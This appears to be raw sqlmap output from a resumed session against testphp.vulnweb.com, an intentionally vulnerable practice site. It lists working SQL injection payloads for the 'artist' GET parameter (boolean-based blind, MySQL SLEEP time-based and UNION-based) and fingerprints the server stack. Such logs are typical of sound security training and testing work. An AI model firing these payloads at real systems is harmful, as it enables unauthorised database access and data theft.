 starting @ 05:21:10 /2023-02-07/

[05:21:10] [INFO] resuming back-end DBMS 'mysql' 
[05:21:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2826=2826

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 7839 FROM (SELECT(SLEEP(5)))Rlld)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9289 UNION ALL SELECT NULL,NULL,CONCAT(0x7171707871,0x6c6d5a58595866706f44546c465a70754f6c647a624f524972694f776863466856474a5170464466,0x716b706a71)-- -
---
[05:21:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[05:21:11] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'
[05:21:11] [WARNING] your sqlmap version is outdated

 ending @ 05:21:11 /2023-02-07/
